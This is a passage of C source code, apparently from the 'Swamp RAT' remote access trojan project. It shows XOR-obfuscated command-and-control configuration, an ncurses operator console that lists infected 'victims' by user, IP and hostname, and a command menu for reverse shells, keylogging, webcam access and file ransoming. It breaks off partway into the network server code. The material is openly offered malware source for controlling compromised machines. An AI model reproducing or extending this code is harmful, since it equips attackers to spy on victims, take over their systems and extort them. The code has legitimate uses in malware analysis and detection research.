| 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #ifndef MAX_DOMAIN_LEN 19 | #define MAX_DOMAIN_LEN 63 20 | #endif 21 | 22 | #ifndef MAX_USERNAME_LEN 23 | #define MAX_USERNAME_LEN 32 24 | #endif 25 | 26 | #ifndef DEFS_XOR_KEY 27 | #define DEFS_XOR_KEY 10 28 | #endif 29 | 30 | #ifndef CONFIG_DEFINED 31 | typedef struct{ 32 | int xor_key; 33 | char host[MAX_DOMAIN_LEN]; 34 | int host_port; 35 | } config; 36 | #define CONFIG_DEFINED 37 | #endif 38 | -------------------------------------------------------------------------------- /src/include/main/config.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include "../defs.h" 23 | #include "crypt.h" 24 | 25 | config *config_create(char * host, 26 | int host_port, 27 | int xor_key){ 28 | /* 29 | :TODO: write config to memory pointer 30 | :host_port: host port 31 | :host: host domain name or ip address 32 | :sandbox_evasion: sandbox evasion 33 | :detection_evasion: detection evasion 34 | :returns: pointer to configuration data 35 | */ 36 | config *p_config = malloc(sizeof(config)); 37 | p_config->host_port = host_port; 38 | if (strlen(host) > MAX_DOMAIN_LEN){ 39 | fprintf(stderr, "error: config host exceeds max domain length\n"); 40 | exit(EXIT_FAILURE); 41 | } else{ 42 | strncpy(p_config->host, host, strlen(host)); 43 | } 44 | p_config->xor_key = xor_key; 45 | return p_config; 46 | } 47 | 48 | bool config_write(char *config_path, 49 | char *host, 50 | int host_port, 51 | int xor_key){ 52 | /* 53 | :TODO: write configuration to file 54 | :host_port: host port 55 | :host: domain name or ip address 56 | :sandbox_evasion: sandbox evasion 57 | :detection_evasion: detection evasion 58 | :returns: bool 59 | */ 60 | config *p_config_host = config_create(host, 61 | host_port, 62 | xor_key); 63 | crypt_encrypt_xor_config(p_config_host, sizeof(config), xor_key); 64 | FILE *fp; 65 | fp = fopen(config_path, "w"); 66 | fwrite(p_config_host, 67 | sizeof(config), 68 | 1, 69 | fp); 70 | fclose(fp); 71 | free(p_config_host); 72 | return true; 73 | } 74 | -------------------------------------------------------------------------------- /src/include/main/crypt.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include "../defs.h" 23 | 24 | bool crypt_encrypt_xor_config(void *data, 25 | int data_size, 26 | int key){ 27 | /* 28 | :TODO: encrypt config data structure 29 | :data: pointer to data structure 30 | :data_size: size of config 31 | :key: xor integer key 32 | :returns: bool 33 | */ 34 | for (int i = 0; i < data_size; i++){ 35 | if (i > (int)sizeof(int) - 1){ 36 | data[i] = data[i]^key; 37 | } 38 | } 39 | return true; 40 | } 41 | 42 | bool crypt_decrypt_xor_config(void *data, 43 | int data_size, 44 | int key){ 45 | /* 46 | :TODO: decrypt config data structure 47 | :data: pointer to data structure 48 | :data_size: size of config 49 | :key: xor integer key 50 | :returns: bool 51 | */ 52 | for (int i = 0; i < data_size; i++){ 53 | if (i > (int)sizeof(int) - 1){ 54 | data[i] = data[i]^key; 55 | } 56 | } 57 | return true; 58 | } 59 | -------------------------------------------------------------------------------- /src/include/main/ncurses.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #ifndef _GNU_SOURCE 19 | #define _GNU_SOURCE 20 | #endif 21 | 22 | #ifndef KEY_ESC 23 | #define KEY_ESC 27 24 | #endif 25 | 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include "net.h" 36 | #include "../common.h" 37 | 38 | #ifndef ARRAY_SIZE 39 | #define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0])) 40 | #endif 41 | 42 | int y_margin = 4; 43 | int x_margin = 8; 44 | 45 | #ifndef NCURSES_WMENU 46 | #define NCURSES_WMENU_COLOR 2 47 | #define NCURSES_WMENU 48 | #endif 49 | 50 | int NCURSES_WMENU_POS = 0; 51 | 52 | WINDOW *ncurses_wmenu_create(WINDOW *win_main){ 53 | /* 54 | :TODO: create menu window 55 | :returns: (WINDOW *) 56 | */ 57 | WINDOW *win_menu; 58 | int y, x; 59 | getmaxyx(win_main, y, x); 60 | win_menu = newwin((y - (y_margin * 2)), 61 | (x - (x_margin * 2)), 62 | 2, 63 | 4); 64 | init_pair(NCURSES_WMENU_COLOR, COLOR_RED, COLOR_BLACK); 65 | wbkgd(win_menu, COLOR_PAIR(NCURSES_WMENU_COLOR)); 66 | return win_menu; 67 | } 68 | 69 | bool ncurses_wmenu(WINDOW *win_main, 70 | WINDOW *win_menu, 71 | char *win_menu_title){ 72 | /* 73 | :TODO: draw menu screen 74 | :win_mein: main window 75 | :win_menu: target menu window 76 | :win_menu_title: menu title 77 | :returns: boolean 78 | */ 79 | int y, x; 80 | getmaxyx(win_main, y, x); 81 | wresize(win_menu, 82 | (y - y_margin), 83 | (x - x_margin)); 84 | box(win_menu, 0, 0); 85 | mvwprintw(win_menu, 86 | 1, 87 | (x / 2) - (strlen(win_menu_title) / 2), 88 | "%s", 89 | win_menu_title); 90 | mvwaddch(win_menu, 2, 0, ACS_LTEE); 91 | mvwhline(win_menu, 92 | 2, 93 | 1, 94 | ACS_HLINE, 95 | (x - x_margin) - 2); 96 | mvwaddch(win_menu, 97 | 2, 98 | (x - x_margin) - 1, 99 | ACS_RTEE); 100 | return true; 101 | } 102 | 103 | bool ncurses_menu_free(MENU *menu, ITEM **items, int n_items){ 104 | unpost_menu(menu); 105 | free_menu(menu); 106 | for(int i = 0; i < n_items; ++i){ 107 | free_item(items[i]); 108 | } 109 | return true; 110 | } 111 | 112 | ITEM **ncurses_item_victims_create(){ 113 | /* 114 | :TODO: creates victim items 115 | :returns: (ITEM **) 116 | */ 117 | ITEM **items; 118 | items = malloc(NET_MAX_CLIENTS * sizeof(ITEM)); 119 | if (items == NULL){ 120 | fprintf(stderr, "%s", strerror(errno)); 121 | exit(EXIT_FAILURE); 122 | } 123 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 124 | items[i] = NULL; 125 | } 126 | return items; 127 | } 128 | 129 | bool ncurses_menu_pos_update(MENU *menu){ 130 | ITEM *item; 131 | item = current_item(menu); 132 | NCURSES_WMENU_POS = item_index(item); 133 | return true; 134 | } 135 | 136 | char *ncurses_victim_description(sys_info_t *sysinfo){ 137 | /* 138 | :TODO: concatinate description for victim 139 | :returns: (char *) 140 | */ 141 | char *result; 142 | asprintf(&result, 143 | "%s@%s arch:%s release:%s hostname:%s load:%d ping:%d", 144 | sysinfo->username, 145 | sysinfo->ip, 146 | sysinfo->arch, 147 | sysinfo->release, 148 | sysinfo->hostname, 149 | sysinfo->cpu_usage, 150 | sysinfo->ping); 151 | return result; 152 | } 153 | 154 | pthread_mutex_t NCURSES_PTHREAD_MUTEX_WMENU_UPDATE = PTHREAD_MUTEX_INITIALIZER; 155 | 156 | MENU *ncurses_wmenu_update(WINDOW *win_main, 157 | WINDOW *win_menu, 158 | ITEM **items, 159 | net_client_beacon_t **p_victims){ 160 | /* 161 | :TODO: update menu window 162 | :returns: (MENU *) 163 | */ 164 | pthread_mutex_lock(&NCURSES_PTHREAD_MUTEX_WMENU_UPDATE); 165 | MENU *menu; 166 | int y, x; 167 | getmaxyx(win_main, y, x); 168 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 169 | if (items[i] != NULL){ 170 | items[i] = NULL; 171 | free_item(items[i]); 172 | } 173 | } 174 | int i_items = 0; 175 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 176 | if (p_victims[i] != NULL){ 177 | items[i_items] = new_item(p_victims[i]->sysinfo.uuid, 178 | ncurses_victim_description(&p_victims[i]->sysinfo)); 179 | i_items++; 180 | } 181 | } 182 | ncurses_wmenu(win_main, win_menu, "Swamp"); 183 | menu = new_menu(items); 184 | set_menu_win(menu, win_menu); 185 | set_menu_sub(menu, derwin(win_menu, 186 | (y - (y_margin * 2)), 187 | (x - (x_margin * 2) + 5), 188 | 3, 189 | 1)); 190 | set_menu_format(menu, 191 | (y - (y_margin * 2)), 192 | 1); 193 | set_menu_mark(menu, " -> "); 194 | post_menu(menu); 195 | pthread_mutex_unlock(&NCURSES_PTHREAD_MUTEX_WMENU_UPDATE); 196 | return menu; 197 | } 198 | 199 | #ifndef NCURSES_WMAIN 200 | #define NCURSES_WMAIN_COLOR 1 201 | #define NCURSES_WMAIN 202 | #endif 203 | 204 | WINDOW *ncurses_wmain_create(int port, 205 | net_client_beacon_t **p_victims, 206 | net_server_beacon_t **p_commands){ 207 | /* 208 | :TODO: initalize main window 209 | :port: server port 210 | :p_victims: pointer to victims data structure 211 | :p_commands: pointer to queued commands 212 | :returns: boolean 213 | */ 214 | WINDOW *win_main; 215 | win_main = initscr(); 216 | if (start_color() == ERR || !has_colors() || !can_change_color()){ 217 | fprintf(stderr, "%s\n", strerror(errno)); 218 | return false; 219 | } 220 | if (net_server_async(port, p_victims, p_commands) == false){ 221 | fprintf(stderr, "[x] failed to initalize cnc server\n"); 222 | return false; 223 | } 224 | noecho(); 225 | curs_set(0); 226 | init_pair(NCURSES_WMAIN_COLOR, COLOR_GREEN, COLOR_BLACK); 227 | wbkgd(win_main, COLOR_PAIR(NCURSES_WMAIN_COLOR)); 228 | return win_main; 229 | } 230 | 231 | pthread_mutex_t NCURSES_PTHREAD_MUTEX_WMAIN_UPDATE = PTHREAD_MUTEX_INITIALIZER; 232 | 233 | bool ncurses_wmain_update(WINDOW *win_main){ 234 | /* 235 | :TODO: update main window 236 | :win_main: main window pointer 237 | :returns: boolean 238 | */ 239 | pthread_mutex_lock(&NCURSES_PTHREAD_MUTEX_WMAIN_UPDATE); 240 | int y, x; 241 | char win_main_title[] = "|Swamp RAT|"; 242 | char win_main_footer[] = "|lillypad|"; 243 | char win_main_logo[] = "~~(__`*>"; 244 | char win_main_quote[] = "\"Fate creeps like a rat.\" - Elizabeth Bowen"; 245 | getmaxyx(win_main, y, x); 246 | wresize(win_main, y, x); 247 | box(win_main, 0, 0); 248 | mvwprintw(win_main, 249 | 0, 250 | (x / 2) - (strlen(win_main_title) / 2), 251 | win_main_title); 252 | mvwprintw(win_main, 253 | y - 1, 254 | (x / 2) - (strlen(win_main_footer) / 2), 255 | win_main_footer); 256 | mvwprintw(win_main, 257 | 1, 258 | 1, 259 | "victims: %d", 260 | NET_VICTIMS_TOTAL); 261 | mvwprintw(win_main, 262 | y - 2, 263 | 1, 264 | "commands: %d", 265 | NET_COMMANDS_TOTAL); 266 | mvwprintw(win_main, 267 | 1, 268 | (x - 1) - strlen(win_main_logo), 269 | win_main_logo); 270 | mvwprintw(win_main, 271 | y - 2, 272 | (x - strlen(win_main_quote) - 1), 273 | win_main_quote); 274 | pthread_mutex_unlock(&NCURSES_PTHREAD_MUTEX_WMAIN_UPDATE); 275 | return true; 276 | } 277 | 278 | #ifndef NCURSES_WFORM_COLOR 279 | #define NCURSES_WFORM_COLOR_FORE 3 280 | #define NCURSES_WFORM_COLOR_BACK 4 281 | #endif 282 | 283 | bool ncurses_wcmd_shell(WINDOW *win_main, 284 | WINDOW *win_menu, 285 | char *uuid, 286 | net_server_beacon_t **p_commands){ 287 | int key; 288 | int y, x; 289 | getmaxyx(win_main, y, x); 290 | FORM *form; 291 | char form_0_desc[] = "ip or domain:"; 292 | char form_1_desc[] = "port:"; 293 | char form_help[] = "HELP: [ENTER] submit, [ESC] quit"; 294 | FIELD **fields = malloc(3 * sizeof(FIELD)); 295 | 296 | fields[0] = new_field(1, 297 | (x - (x_margin * 2) - 2 - strlen(form_0_desc)), 298 | 0, 299 | (strlen(form_0_desc) + 1), 300 | 0, 301 | 0); 302 | fields[1] = new_field(1, 303 | (x - (x_margin * 2) - 2 - strlen(form_0_desc)), 304 | 2, (strlen(form_0_desc) + 1), 305 | 0, 306 | 0); 307 | fields[2] = NULL; 308 | 309 | init_pair(NCURSES_WFORM_COLOR_FORE, COLOR_BLACK, COLOR_RED); 310 | init_pair(NCURSES_WFORM_COLOR_BACK, COLOR_BLACK, COLOR_RED); 311 | 312 | 313 | set_field_fore(fields[0], COLOR_PAIR(NCURSES_WFORM_COLOR_FORE)); 314 | set_field_back(fields[0], A_UNDERLINE); 315 | set_field_back(fields[0], COLOR_PAIR(NCURSES_WFORM_COLOR_BACK)); 316 | field_opts_off(fields[0], O_AUTOSKIP); 317 | set_field_fore(fields[1], COLOR_PAIR(NCURSES_WFORM_COLOR_FORE)); 318 | set_field_back(fields[1], A_UNDERLINE); 319 | set_field_back(fields[1], COLOR_PAIR(NCURSES_WFORM_COLOR_BACK)); 320 | field_opts_off(fields[1], O_AUTOSKIP); 321 | 322 | form = new_form(fields); 323 | 324 | curs_set(1); 325 | 326 | wclear(win_menu); 327 | 328 | ncurses_wmenu(win_main, win_menu, "Reverse Shell"); 329 | 330 | set_form_win(form, win_menu); 331 | 332 | set_form_sub(form, derwin(win_menu, 333 | (y - (y_margin * 2)), 334 | (x - (x_margin * 2)), 335 | 3, 336 | 1)); 337 | post_form(form); 338 | 339 | mvwprintw(win_menu, 3, 1, form_0_desc); 340 | mvwprintw(win_menu, 5, 1, form_1_desc); 341 | mvwprintw(win_menu, 7, 1, form_help); 342 | 343 | wrefresh(win_main); 344 | wrefresh(win_menu); 345 | 346 | keypad(win_menu, TRUE); 347 | 348 | form_driver(form, REQ_NEXT_FIELD); 349 | form_driver(form, REQ_NEXT_FIELD); 350 | while (true){ 351 | key = wgetch(win_menu); 352 | if (key == KEY_RESIZE){ 353 | wclear(win_main); 354 | wclear(win_menu); 355 | ncurses_wmain_update(win_main); 356 | getmaxyx(win_main, y, x); 357 | fields[0] = new_field(1, 358 | (x - (x_margin * 2) - 2 - strlen(form_0_desc)), 359 | 0, 360 | (strlen(form_0_desc) + 1), 361 | 0, 362 | 0); 363 | fields[1] = new_field(1, 364 | (x - (x_margin * 2) - 2 - strlen(form_0_desc)), 365 | 2, (strlen(form_0_desc) + 1), 366 | 0, 367 | 0); 368 | fields[2] = NULL; 369 | 370 | init_pair(NCURSES_WFORM_COLOR_FORE, COLOR_BLACK, COLOR_RED); 371 | init_pair(NCURSES_WFORM_COLOR_BACK, COLOR_BLACK, COLOR_RED); 372 | 373 | 374 | set_field_fore(fields[0], COLOR_PAIR(NCURSES_WFORM_COLOR_FORE)); 375 | set_field_back(fields[0], A_UNDERLINE); 376 | set_field_back(fields[0], COLOR_PAIR(NCURSES_WFORM_COLOR_BACK)); 377 | field_opts_off(fields[0], O_AUTOSKIP); 378 | set_field_fore(fields[1], COLOR_PAIR(NCURSES_WFORM_COLOR_FORE)); 379 | set_field_back(fields[1], A_UNDERLINE); 380 | set_field_back(fields[1], COLOR_PAIR(NCURSES_WFORM_COLOR_BACK)); 381 | field_opts_off(fields[1], O_AUTOSKIP); 382 | 383 | form = new_form(fields); 384 | 385 | curs_set(1); 386 | 387 | ncurses_wmenu(win_main, win_menu, "Reverse Shell"); 388 | set_form_win(form, win_menu); 389 | set_form_sub(form, derwin(win_menu, 390 | (y - (y_margin * 2)), 391 | (x - (x_margin * 2)), 392 | 3, 393 | 1)); 394 | post_form(form); 395 | mvwprintw(win_menu, 3, 1, form_0_desc); 396 | mvwprintw(win_menu, 5, 1, form_1_desc); 397 | mvwprintw(win_menu, 7, 1, form_help); 398 | wrefresh(win_main); 399 | wrefresh(win_menu); 400 | form_driver(form, REQ_NEXT_FIELD); 401 | form_driver(form, REQ_NEXT_FIELD); 402 | continue; 403 | } 404 | if (key == KEY_ESC){ 405 | curs_set(0); 406 | unpost_form(form); 407 | free_form(form); 408 | for (int i = 0; i < 3; i++){ 409 | free_field(fields[i]); 410 | } 411 | return false; 412 | } else if (key == KEY_DOWN){ 413 | form_driver(form, REQ_NEXT_FIELD); 414 | form_driver(form, REQ_END_LINE); 415 | continue; 416 | } else if (key == KEY_UP){ 417 | form_driver(form, REQ_PREV_FIELD); 418 | form_driver(form, REQ_END_LINE); 419 | continue; 420 | } else if (key == KEY_BACKSPACE){ 421 | form_driver(form, REQ_DEL_PREV); 422 | continue; 423 | } else if (key == KEY_LEFT){ 424 | form_driver(form, REQ_LEFT_CHAR); 425 | continue; 426 | } else if (key == KEY_RIGHT){ 427 | form_driver(form, REQ_RIGHT_CHAR); 428 | continue; 429 | } else if (key == '\t'){ 430 | form_driver(form, REQ_NEXT_FIELD); 431 | } else if (key == 10 || key == KEY_ENTER){ 432 | form_driver(form, REQ_NEXT_FIELD); 433 | if (net_update_commands_shell(field_buffer(fields[0], 0), 434 | atoi(field_buffer(fields[1], 0)), 435 | uuid, 436 | p_commands) != true){ 437 | mvwprintw(win_menu, 9, 1, "error: ip, domain or port is invalid!"); 438 | continue; 439 | } else { 440 | break; 441 | } 442 | } else { 443 | form_driver(form, key); 444 | continue; 445 | } 446 | } 447 | curs_set(0); 448 | unpost_form(form); 449 | free_form(form); 450 | for (int i = 0; i < 3; i++){ 451 | free_field(fields[i]); 452 | } 453 | return true; 454 | } 455 | 456 | #ifndef NCF_OPTS 457 | #define NCF_OPTS_SHELL 1 458 | #define NCF_OPTS_KEYLOG 2 459 | #define NCF_OPTS_WEBCAM 3 460 | #define NCF_OPTS_RANSOM 4 461 | #define NCF_OPTS_BACK 5 462 | #define NCF_OPTS 463 | #endif 464 | 465 | int ncurses_wcmd_select(WINDOW *win_main, WINDOW *win_menu, char *uuid){ 466 | MENU *menu; 467 | int n_choices, key; 468 | ITEM **item_options; 469 | char *options[] = { 470 | "reverse shell", 471 | "keylogger", 472 | "webcam", 473 | "ransom files", 474 | "back", 475 | }; 476 | int x, y; 477 | n_choices = ARRAY_SIZE(options); 478 | item_options = (ITEM **)calloc(n_choices + 1, sizeof(ITEM *)); 479 | for(int i = 0; i < n_choices; ++i){ 480 | item_options[i] = new_item(itoa(i+1), options[i]); 481 | } 482 | item_options[n_choices] = (ITEM *)NULL; 483 | menu = new_menu((ITEM **)item_options); 484 | getmaxyx(win_main, y, x); 485 | wresize(win_menu, 486 | (y - y_margin), 487 | (x - x_margin)); 488 | keypad(win_menu, TRUE); 489 | wclear(win_menu); 490 | set_menu_win(menu, win_menu); 491 | set_menu_sub(menu, 492 | derwin(win_menu, 493 | y - (y_margin * 2), 494 | x - (x_margin * 2), 495 | 3, 496 | 1) 497 | ); 498 | set_menu_mark(menu, " -> "); 499 | set_menu_format(menu, 500 | (y - (y_margin * 2)), 501 | 1); 502 | ncurses_wmenu(win_main, win_menu, uuid); 503 | post_menu(menu); 504 | wrefresh(win_menu); 505 | while (true){ 506 | key = wgetch(win_menu); 507 | if (key == KEY_RESIZE){ 508 | wclear(win_main); 509 | wclear(win_menu); 510 | ncurses_wmain_update(win_main); 511 | getmaxyx(win_main, y, x); 512 | set_menu_win(menu, win_menu); 513 | set_menu_sub(menu, 514 | derwin(win_menu, 515 | y - (y_margin * 2), 516 | x - (x_margin * 2), 517 | 3, 518 | 1) 519 | ); 520 | set_menu_mark(menu, " -> "); 521 | set_menu_format(menu, 522 | (y - (y_margin * 2)), 523 | 1); 524 | ncurses_wmenu(win_main, win_menu, uuid); 525 | post_menu(menu); 526 | wrefresh(win_main); 527 | wrefresh(win_menu); 528 | } 529 | if (key == KEY_DOWN){ 530 | menu_driver(menu, REQ_DOWN_ITEM); 531 | } 532 | if (key == KEY_UP){ 533 | menu_driver(menu, REQ_UP_ITEM); 534 | } 535 | if (key == KEY_NPAGE){ 536 | menu_driver(menu, REQ_SCR_DPAGE); 537 | } 538 | if (key == KEY_PPAGE){ 539 | menu_driver(menu, REQ_SCR_UPAGE); 540 | } 541 | if (key == KEY_LEFT){ 542 | break; 543 | } 544 | if (key == 10 || key == KEY_ENTER || key == KEY_RIGHT){ 545 | ITEM *item_selected; 546 | item_selected = current_item(menu); 547 | int option = atoi(item_name(item_selected)); 548 | ncurses_menu_free(menu, item_options, n_choices); 549 | return option; 550 | } 551 | } 552 | ncurses_menu_free(menu, item_options, n_choices); 553 | return -1; 554 | } 555 | 556 | static void ncurses_pthread_cleanup(void *args){ 557 | pthread_detach((pthread_t)args); 558 | } 559 | 560 | bool NCURSES_PTHREAD_WMAIN_UPDATE_SUSPEND = false; 561 | 562 | typedef struct{ 563 | WINDOW *win_main; 564 | WINDOW *win_menu; 565 | MENU *p_menu_victims; 566 | ITEM **p_item_victims; 567 | net_client_beacon_t **p_victims; 568 | net_server_beacon_t **p_commands; 569 | } ncurses_pthread_wmain_update_args_t; 570 | 571 | void *ncurses_pthread_wmain_update(void *args){ 572 | /* 573 | :TODO: pthread to update main window/menu on new connections or command queue 574 | :returns: NULL 575 | */ 576 | pthread_t id = pthread_self(); 577 | ncurses_pthread_wmain_update_args_t *p_args = args; 578 | pthread_cleanup_push(ncurses_pthread_cleanup, &id); 579 | while (true){ 580 | if (NCURSES_PTHREAD_WMAIN_UPDATE_SUSPEND == false){ 581 | wclear(p_args->win_main); 582 | wclear(p_args->win_menu); 583 | ncurses_wmain_update(p_args->win_main); 584 | p_args->p_menu_victims = ncurses_wmenu_update(p_args->win_main, 585 | p_args->win_menu, 586 | p_args->p_item_victims, 587 | p_args->p_victims); 588 | if (NET_VICTIMS_TOTAL > 0){ 589 | if (NCURSES_WMENU_POS > (NET_VICTIMS_TOTAL - 1)){ 590 | NCURSES_WMENU_POS = NET_VICTIMS_TOTAL - 1; 591 | set_current_item(p_args->p_menu_victims, 592 | p_args->p_item_victims[NCURSES_WMENU_POS]); 593 | } else { 594 | set_current_item(p_args->p_menu_victims, 595 | p_args->p_item_victims[NCURSES_WMENU_POS]); 596 | } 597 | } 598 | 599 | wrefresh(p_args->win_main); 600 | wrefresh(p_args->win_menu); 601 | } 602 | sleep(1); 603 | } 604 | free(args); 605 | pthread_cleanup_pop(0); 606 | pthread_exit(NULL); 607 | } 608 | 609 | bool ncurses_main(int port){ 610 | int key; 611 | 612 | if (putenv("TERM=linux") != 0){ 613 | fprintf(stderr, "%s\n", strerror(errno)); 614 | return false; 615 | } 616 | 617 | net_client_beacon_t **p_victims = net_create_victims(); 618 | net_server_beacon_t **p_commands = net_create_commands(); 619 | 620 | ITEM **p_item_victims = ncurses_item_victims_create(); 621 | 622 | WINDOW *win_main = ncurses_wmain_create(port, p_victims, p_commands); 623 | ncurses_wmain_update(win_main); 624 | 625 | WINDOW *win_menu = ncurses_wmenu_create(win_main); 626 | MENU *p_menu_victims = ncurses_wmenu_update(win_main, 627 | win_menu, 628 | p_item_victims, 629 | p_victims); 630 | 631 | wrefresh(win_main); 632 | wrefresh(win_menu); 633 | 634 | pthread_t t_ncurses_pthread_wmain_update; 635 | pthread_attr_t pthread_attr_detached; 636 | pthread_attr_init(&pthread_attr_detached); 637 | pthread_attr_setdetachstate(&pthread_attr_detached, PTHREAD_CREATE_DETACHED); 638 | ncurses_pthread_wmain_update_args_t *p_ncurses_pthread_wmain_update_args = malloc(sizeof(ncurses_pthread_wmain_update_args_t)); 639 | p_ncurses_pthread_wmain_update_args->win_main = win_main; 640 | p_ncurses_pthread_wmain_update_args->win_menu = win_menu; 641 | p_ncurses_pthread_wmain_update_args->p_victims = p_victims; 642 | p_ncurses_pthread_wmain_update_args->p_commands = p_commands; 643 | p_ncurses_pthread_wmain_update_args->p_item_victims = p_item_victims; 644 | p_ncurses_pthread_wmain_update_args->p_menu_victims = p_menu_victims; 645 | pthread_create(&t_ncurses_pthread_wmain_update, 646 | &pthread_attr_detached, 647 | ncurses_pthread_wmain_update, 648 | p_ncurses_pthread_wmain_update_args); 649 | 650 | keypad(win_menu, TRUE); 651 | 652 | while (true){ 653 | key = wgetch(win_menu); 654 | if (key == KEY_RESIZE){ 655 | wclear(win_main); 656 | wclear(win_menu); 657 | ncurses_wmain_update(win_main); 658 | p_menu_victims = ncurses_wmenu_update(win_main, 659 | win_menu, 660 | p_item_victims, 661 | p_victims); 662 | set_current_item(p_menu_victims, p_item_victims[NCURSES_WMENU_POS]); 663 | wrefresh(win_main); 664 | wrefresh(win_menu); 665 | } 666 | if (key == KEY_DOWN && (NCURSES_WMENU_POS < (NET_VICTIMS_TOTAL - 1))){ 667 | p_menu_victims = ncurses_wmenu_update(win_main, 668 | win_menu, 669 | p_item_victims, 670 | p_victims); 671 | set_current_item(p_menu_victims, 672 | p_item_victims[NCURSES_WMENU_POS + 1]); 673 | NCURSES_WMENU_POS = NCURSES_WMENU_POS + 1; 674 | wrefresh(win_menu); 675 | } 676 | if (key == KEY_UP && NCURSES_WMENU_POS > 0){ 677 | p_menu_victims = ncurses_wmenu_update(win_main, 678 | win_menu, 679 | p_item_victims, 680 | p_victims); 681 | set_current_item(p_menu_victims, 682 | p_item_victims[NCURSES_WMENU_POS - 1]); 683 | NCURSES_WMENU_POS = NCURSES_WMENU_POS - 1; 684 | wrefresh(win_menu); 685 | } 686 | if (key == KEY_ESC || key == KEY_LEFT){ 687 | break; 688 | } 689 | if ((key == 10 || key == KEY_ENTER || key == KEY_RIGHT) && NET_VICTIMS_TOTAL > 0){ 690 | NCURSES_PTHREAD_WMAIN_UPDATE_SUSPEND = true; 691 | ITEM *item; 692 | char uuid[SYS_UUID_SIZE]; 693 | if (NCURSES_WMENU_POS == 0){ 694 | p_menu_victims = ncurses_wmenu_update(win_main, 695 | win_menu, 696 | p_item_victims, 697 | p_victims); 698 | set_current_item(p_menu_victims, p_item_victims[0]); 699 | } 700 | item = current_item(p_menu_victims); 701 | strncpy(uuid, item_name(item), SYS_UUID_SIZE); 702 | int option = ncurses_wcmd_select(win_main, win_menu, uuid); 703 | if (option == NCF_OPTS_SHELL){ 704 | ncurses_wcmd_shell(win_main, win_menu, uuid, p_commands); 705 | } 706 | wclear(win_main); 707 | wclear(win_menu); 708 | ncurses_wmain_update(win_main); 709 | p_menu_victims = ncurses_wmenu_update(win_main, 710 | win_menu, 711 | p_item_victims, 712 | p_victims); 713 | set_current_item(p_menu_victims, p_item_victims[NCURSES_WMENU_POS]); 714 | wrefresh(win_main); 715 | wrefresh(win_menu); 716 | NCURSES_PTHREAD_WMAIN_UPDATE_SUSPEND = false; 717 | } 718 | } 719 | endwin(); 720 | printf("leaving the swamp!\n"); 721 | pthread_attr_destroy(&pthread_attr_detached); 722 | ncurses_menu_free(p_menu_victims, 723 | p_item_victims, 724 | NET_MAX_CLIENTS); 725 | net_cleanup_victims(p_victims); 726 | net_cleanup_commands(p_commands); 727 | return true; 728 | } 729 | -------------------------------------------------------------------------------- /src/include/main/net.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include "../net.h" 28 | #include "../crypt.h" 29 | #include "../defs.h" 30 | 31 | #ifndef NET_MAX_CLIENTS 32 | #define NET_MAX_CLIENTS 128 33 | #endif 34 | 35 | pthread_mutex_t NET_PTHREAD_MUTEX = PTHREAD_MUTEX_INITIALIZER; 36 | 37 | int NET_VICTIMS_TOTAL = 0; 38 | int NET_COMMANDS_TOTAL= 0; 39 | 40 | net_client_beacon_t **net_create_victims(){ 41 | int count = NET_MAX_CLIENTS; 42 | net_client_beacon_t **v; 43 | v = malloc(count * sizeof(net_client_beacon_t)); 44 | if (v == NULL){ 45 | fprintf(stderr, "[x] %s\n", strerror(errno)); 46 | 